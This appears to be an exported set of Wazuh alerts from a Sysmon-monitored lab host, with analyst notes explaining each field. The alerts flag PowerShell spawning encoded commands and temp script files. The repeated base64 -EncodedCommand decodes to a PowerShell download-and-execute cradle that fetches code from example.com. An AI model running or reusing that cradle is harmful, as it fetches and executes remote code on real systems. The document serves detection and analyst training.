data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd1c-680a-3d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13236
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:22.983+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:22.983+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  54
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534242.1395871
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:20.2262631Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283660
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:20.190 ProcessGuid: {94294ddc-bd1e-680a-3f0b-000000000e00} ProcessId: 14648 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mzprdnal.c0e.ps1 CreationUtcTime: 2025-04-24 22:37:20.190 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:20.190
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd1e-680a-3f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14648
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mzprdnal.c0e.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:20.190
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:26.463+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:26.463+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  51
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534246.1398640
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:23.7195139Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283756
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:21.851 ProcessGuid: {94294ddc-bd21-680a-440b-000000000e00} ProcessId: 11516 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd1e-680a-3f0b-000000000e00} ParentProcessId: 14648 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:21.851
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd21-680a-440b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd1e-680a-3f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14648
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:26.587+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:26.587+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  55
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534246.1406711
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:24.1476257Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283761
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:24.093 ProcessGuid: {94294ddc-bd21-680a-440b-000000000e00} ProcessId: 11516 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mfjw4oz5.dr3.ps1 CreationUtcTime: 2025-04-24 22:37:24.093 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:24.093
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd21-680a-440b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mfjw4oz5.dr3.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:24.093
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:30.296+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:30.296+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  52
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534250.1409480
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the fields below follow the Sysmon schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that ETW provider. Filter on it when the provider name is missing or renamed.

data.win.system.eventID:  1
Sysmon event ID, not a Security-log ID like 4624/4688: 1 = Process Create, 3 = Network Connect, 11 = FileCreate, 13 = Registry Value Set. This alert is EID 1, a process start.

data.win.system.version:  5
Schema version of this event type. Field layout can change between Sysmon releases, so check it before trusting a parser.

data.win.system.level:  4
Numeric log level (4 = Informational). Sysmon writes almost everything at 4, so don't triage on it.

data.win.system.task:  1
Task category number. For Sysmon events it mirrors the event ID (1 here), so it adds nothing eventID didn't.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:28.2950627Z
When the record was written to the Windows log (UTC, 100 ns precision). Compare with data.win.eventdata.utcTime to see Sysmon's buffering delay.

data.win.system.eventRecordID:  283820
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that logged the event, not of the process in the alert. It is the same value on every Sysmon event from this host.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Only needed in deep forensics.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in. Microsoft-Windows-Sysmon/Operational is Sysmon's own log; open it in Event Viewer to read the neighbouring records.

data.win.system.computer:  Attacker
Hostname as recorded by Windows. Should match agent.name; a mismatch means a renamed host or a forwarded log.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:26.762 ProcessGuid: {94294ddc-bd26-680a-460b-000000000e00} ProcessId: 2020 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd21-680a-440b-000000000e00} ParentProcessId: 11516 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Full rendered Sysmon Process Create text. Every data.win.eventdata.* field below is parsed out of it; go back to this when a parsed value looks escaped or cut off.

data.win.eventdata.utcTime:  2025-04-24 22:37:26.762
Sysmon's own UTC timestamp for the process start, to the millisecond. The most precise "when" in the alert; the top-level timestamp is when Wazuh ingested it.

data.win.eventdata.processGuid:  {94294ddc-bd26-680a-460b-000000000e00}
Sysmon's unique ID for the new process (survives PID reuse). Pivot on it to find every file, network and registry event this process went on to produce.

data.win.eventdata.processId:  2020
Windows PID of the new process. PIDs are recycled, so correlate on processGuid, not on this.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable that started. Check it is the real System32 binary and not a same-named copy elsewhere.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version string from the binary's resource section. 10.0.26100.x is the Windows 11 24H2 line; a powershell.exe that doesn't match the host's OS build deserves a second look.

